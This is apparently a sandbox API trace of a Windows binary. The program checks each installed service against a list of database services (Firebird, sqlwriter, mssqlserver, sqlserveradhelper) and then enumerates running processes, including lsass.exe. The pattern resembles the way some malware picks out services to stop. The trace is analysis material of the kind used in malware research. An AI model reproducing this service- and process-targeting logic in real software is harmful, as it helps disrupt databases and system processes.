1 [0057.641] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0057.641] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0057.641] lstrlenW (lpString="Audiosrv") returned 8 [0057.641] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Audiosrv") returned 1 [0057.641] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Audiosrv") returned 1 [0057.641] lstrcmpiW (lpString1="sqlwriter", lpString2="Audiosrv") returned 1 [0057.641] lstrcmpiW (lpString1="mssqlserver", lpString2="Audiosrv") returned 1 [0057.641] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Audiosrv") returned 1 [0057.641] lstrlenW (lpString="BFE") returned 3 [0057.641] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0057.641] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0057.641] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0057.641] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0057.641] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0057.641] lstrlenW (lpString="BITS") returned 4 [0057.641] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BITS") returned 1 [0057.641] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BITS") returned 1 [0057.641] lstrcmpiW (lpString1="sqlwriter", lpString2="BITS") returned 1 [0057.641] lstrcmpiW (lpString1="mssqlserver", lpString2="BITS") returned 1 [0057.641] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BITS") returned 1 [0057.642] lstrlenW (lpString="BrokerInfrastructure") returned 20 [0057.642] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0057.642] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0057.642] lstrcmpiW (lpString1="sqlwriter", lpString2="BrokerInfrastructure") returned 1 [0057.642] lstrcmpiW (lpString1="mssqlserver", lpString2="BrokerInfrastructure") returned 1 [0057.642] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BrokerInfrastructure") returned 1 [0057.642] lstrlenW (lpString="CDPSvc") returned 6 [0057.642] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CDPSvc") returned 1 [0057.642] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CDPSvc") returned 1 [0057.642] lstrcmpiW (lpString1="sqlwriter", lpString2="CDPSvc") returned 1 [0057.642] lstrcmpiW (lpString1="mssqlserver", lpString2="CDPSvc") returned 1 [0057.642] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CDPSvc") returned 1 [0057.642] lstrlenW (lpString="ClickToRunSvc") returned 13 [0057.642] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0057.642] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0057.642] lstrcmpiW (lpString1="sqlwriter", lpString2="ClickToRunSvc") returned 1 [0057.642] lstrcmpiW (lpString1="mssqlserver", lpString2="ClickToRunSvc") returned 1 [0057.642] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ClickToRunSvc") returned 1 [0057.642] lstrlenW (lpString="CoreMessagingRegistrar") returned 22 [0057.642] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0057.642] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0057.642] lstrcmpiW (lpString1="sqlwriter", lpString2="CoreMessagingRegistrar") returned 1 [0057.642] lstrcmpiW (lpString1="mssqlserver", lpString2="CoreMessagingRegistrar") returned 1 [0057.642] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CoreMessagingRegistrar") returned 1 [0057.642] lstrlenW (lpString="CryptSvc") returned 8 [0057.642] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0057.642] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0057.642] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0057.642] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0057.643] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0057.643] lstrlenW (lpString="DcomLaunch") returned 10 [0057.643] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0057.643] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0057.643] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0057.643] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0057.643] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0057.643] lstrlenW (lpString="DeviceAssociationService") returned 24 [0057.643] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0057.643] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0057.643] lstrcmpiW (lpString1="sqlwriter", lpString2="DeviceAssociationService") returned 1 [0057.643] lstrcmpiW (lpString1="mssqlserver", lpString2="DeviceAssociationService") returned 1 [0057.643] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DeviceAssociationService") returned 1 [0057.643] lstrlenW (lpString="Dhcp") returned 4 [0057.643] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0057.644] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0057.644] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0057.644] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0057.644] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0057.644] lstrlenW (lpString="Dnscache") returned 8 [0057.644] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0057.644] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0057.644] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0057.644] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0057.644] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0057.644] lstrlenW (lpString="DoSvc") returned 5 [0057.644] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DoSvc") returned 1 [0057.644] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DoSvc") returned 1 [0057.644] lstrcmpiW (lpString1="sqlwriter", lpString2="DoSvc") returned 1 [0057.644] lstrcmpiW (lpString1="mssqlserver", lpString2="DoSvc") returned 1 [0057.644] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DoSvc") returned 1 [0057.644] lstrlenW (lpString="DPS") returned 3 [0057.644] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0057.644] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0057.644] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0057.644] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0057.644] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0057.644] lstrlenW (lpString="DusmSvc") returned 7 [0057.644] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DusmSvc") returned 1 [0057.644] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DusmSvc") returned 1 [0057.644] lstrcmpiW (lpString1="sqlwriter", lpString2="DusmSvc") returned 1 [0057.644] lstrcmpiW (lpString1="mssqlserver", lpString2="DusmSvc") returned 1 [0057.645] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DusmSvc") returned 1 [0057.645] lstrlenW (lpString="EventLog") returned 8 [0057.645] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventLog") returned 1 [0057.645] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventLog") returned 1 [0057.645] lstrcmpiW (lpString1="sqlwriter", lpString2="EventLog") returned 1 [0057.645] lstrcmpiW (lpString1="mssqlserver", lpString2="EventLog") returned 1 [0057.645] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventLog") returned 1 [0057.646] lstrlenW (lpString="EventSystem") returned 11 [0057.646] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0057.646] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0057.646] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0057.646] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0057.646] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0057.646] lstrlenW (lpString="FontCache") returned 9 [0057.646] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="FontCache") returned -1 [0057.646] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="FontCache") returned -1 [0057.646] lstrcmpiW (lpString1="sqlwriter", lpString2="FontCache") returned 1 [0057.646] lstrcmpiW (lpString1="mssqlserver", lpString2="FontCache") returned 1 [0057.646] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="FontCache") returned 1 [0057.646] lstrlenW (lpString="gpsvc") returned 5 [0057.646] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0057.646] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0057.646] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0057.646] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0057.646] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0057.646] lstrlenW (lpString="iphlpsvc") returned 8 [0057.647] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0057.647] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0057.647] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0057.647] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0057.647] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0057.647] lstrlenW (lpString="KeyIso") returned 6 [0057.647] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="KeyIso") returned -1 [0057.647] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="KeyIso") returned -1 [0057.647] lstrcmpiW (lpString1="sqlwriter", lpString2="KeyIso") returned 1 [0057.647] lstrcmpiW (lpString1="mssqlserver", lpString2="KeyIso") returned 1 [0057.647] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="KeyIso") returned 1 [0057.647] lstrlenW (lpString="LanmanServer") returned 12 [0057.647] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0057.647] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0057.647] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0057.647] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0057.647] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0057.647] lstrlenW (lpString="LanmanWorkstation") returned 17 [0057.647] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0057.647] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0057.647] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0057.647] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0057.647] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0057.647] lstrlenW (lpString="lfsvc") returned 5 [0057.647] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lfsvc") returned -1 [0057.647] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lfsvc") returned -1 [0057.647] lstrcmpiW (lpString1="sqlwriter", lpString2="lfsvc") returned 1 [0057.647] lstrcmpiW (lpString1="mssqlserver", lpString2="lfsvc") returned 1 [0057.647] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lfsvc") returned 1 [0057.648] lstrlenW (lpString="lmhosts") returned 7 [0057.648] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0057.648] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0057.648] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0057.648] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0057.648] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0057.648] lstrlenW (lpString="LSM") returned 3 [0057.648] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LSM") returned -1 [0057.648] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LSM") returned -1 [0057.648] lstrcmpiW (lpString1="sqlwriter", lpString2="LSM") returned 1 [0057.648] lstrcmpiW (lpString1="mssqlserver", lpString2="LSM") returned 1 [0057.648] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LSM") returned 1 [0057.648] lstrlenW (lpString="MpsSvc") returned 6 [0057.648] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0057.648] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0057.648] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0057.648] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0057.648] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0057.648] lstrlenW (lpString="NcbService") returned 10 [0057.648] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NcbService") returned -1 [0057.648] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NcbService") returned -1 [0057.648] lstrcmpiW (lpString1="sqlwriter", lpString2="NcbService") returned 1 [0057.648] lstrcmpiW (lpString1="mssqlserver", lpString2="NcbService") returned -1 [0057.648] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NcbService") returned 1 [0057.648] lstrlenW (lpString="netprofm") returned 8 [0057.648] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0057.648] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0057.648] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0057.648] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0057.649] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0057.649] lstrlenW (lpString="NlaSvc") returned 6 [0057.649] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0057.649] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0057.649] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0057.649] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0057.649] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0057.649] lstrlenW (lpString="nsi") returned 3 [0057.649] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0057.649] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0057.649] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0057.649] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0057.649] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0057.649] lstrlenW (lpString="PcaSvc") returned 6 [0057.649] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0057.649] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0057.649] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0057.649] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0057.649] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0057.649] lstrlenW (lpString="PlugPlay") returned 8 [0057.649] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0057.649] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0057.649] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0057.649] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0057.649] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0057.649] lstrlenW (lpString="Power") returned 5 [0057.649] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0057.649] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0057.649] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0057.649] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0057.650] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0057.650] lstrlenW (lpString="ProfSvc") returned 7 [0057.650] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0057.650] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0057.650] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0057.650] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0057.650] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0057.650] lstrlenW (lpString="RpcEptMapper") returned 12 [0057.650] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0057.650] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0057.650] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0057.650] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0057.650] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0057.650] lstrlenW (lpString="RpcSs") returned 5 [0057.650] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0057.650] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0057.650] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0057.650] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0057.650] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0057.650] lstrlenW (lpString="SamSs") returned 5 [0057.650] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0057.650] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0057.650] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0057.650] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0057.650] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0057.650] lstrlenW (lpString="Schedule") returned 8 [0057.650] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0057.650] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0057.650] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0057.650] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0057.651] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0057.651] lstrlenW (lpString="SecurityHealthService") returned 21 [0057.651] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SecurityHealthService") returned -1 [0057.651] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SecurityHealthService") returned -1 [0057.651] lstrcmpiW (lpString1="sqlwriter", lpString2="SecurityHealthService") returned 1 [0057.651] lstrcmpiW (lpString1="mssqlserver", lpString2="SecurityHealthService") returned -1 [0057.651] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SecurityHealthService") returned 1 [0057.651] lstrlenW (lpString="SENS") returned 4 [0057.651] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0057.651] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0057.651] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0057.651] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0057.651] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0057.651] lstrlenW (lpString="ShellHWDetection") returned 16 [0057.651] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0057.651] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0057.651] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0057.651] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0057.651] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0057.651] lstrlenW (lpString="Spooler") returned 7 [0057.651] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0057.651] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0057.651] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0057.651] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0057.651] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0057.651] lstrlenW (lpString="SSDPSRV") returned 7 [0057.651] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SSDPSRV") returned -1 [0057.651] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SSDPSRV") returned -1 [0057.651] lstrcmpiW (lpString1="sqlwriter", lpString2="SSDPSRV") returned -1 [0057.652] lstrcmpiW (lpString1="mssqlserver", lpString2="SSDPSRV") returned -1 [0057.652] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SSDPSRV") returned -1 [0057.652] lstrlenW (lpString="StateRepository") returned 15 [0057.652] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="StateRepository") returned -1 [0057.652] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="StateRepository") returned -1 [0057.652] lstrcmpiW (lpString1="sqlwriter", lpString2="StateRepository") returned -1 [0057.652] lstrcmpiW (lpString1="mssqlserver", lpString2="StateRepository") returned -1 [0057.652] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="StateRepository") returned -1 [0057.652] lstrlenW (lpString="SysMain") returned 7 [0057.652] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0057.652] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0057.652] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0057.652] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0057.652] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0057.652] lstrlenW (lpString="SystemEventsBroker") returned 18 [0057.652] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0057.652] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0057.652] lstrcmpiW (lpString1="sqlwriter", lpString2="SystemEventsBroker") returned -1 [0057.652] lstrcmpiW (lpString1="mssqlserver", lpString2="SystemEventsBroker") returned -1 [0057.652] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x6c0978 | out: hHeap=0x5d0000) returned 1 [0057.652] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x368 [0057.657] Process32FirstW (in: hSnapshot=0x368, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0058.085] Process32NextW (in: hSnapshot=0x368, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6c, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0058.086] lstrlenW (lpString="System") returned 6 [0058.086] Process32NextW (in: hSnapshot=0x368, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0058.087] lstrlenW (lpString="smss.exe") returned 8 [0058.087] Process32NextW (in: hSnapshot=0x368, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x19c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x194, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0058.087] lstrlenW (lpString="csrss.exe") returned 9 [0058.088] Process32NextW (in: hSnapshot=0x368, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x194, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0058.088] lstrlenW (lpString="wininit.exe") returned 11 [0058.088] Process32NextW (in: hSnapshot=0x368, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e4, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0058.089] lstrlenW (lpString="csrss.exe") returned 9 [0058.089] Process32NextW (in: hSnapshot=0x368, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1e4, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0058.090] lstrlenW (lpString="winlogon.exe") returned 12 [0058.090] Process32NextW (in: hSnapshot=0x368, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1ec, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0058.090] lstrlenW (lpString="services.exe") returned 12 [0058.090] Process32NextW (in: hSnapshot=0x368, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1ec, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0058.091] lstrlenW (lpString="lsass.exe") returned 9 [0058.091] Process32NextW (in: hSnapshot=0x368, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0058.092] lstrlenW (lpString="svchost.exe") returned 11 [0058.092] Process32NextW (in: hSnapshot=0x368, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x234, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0058.092] lstrlenW (lpString="fontdrvhost.exe") returned 15 